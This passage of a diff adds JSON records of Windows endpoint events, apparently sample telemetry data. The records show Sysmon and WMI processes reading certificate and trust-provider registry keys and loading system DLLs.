"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482290000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfproc.dll", + "image_path": "C:\\Windows\\System32\\perfproc.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "fastprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": 
"C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed", + "registry_value": "Performance Refreshed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sysmain.dll", + "image_path": "C:\\Windows\\System32\\sysmain.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + 
"registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmiprov.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wmiprov.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "rasctrs.dll", + "image_path": "C:\\Windows\\System32\\rasctrs.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": 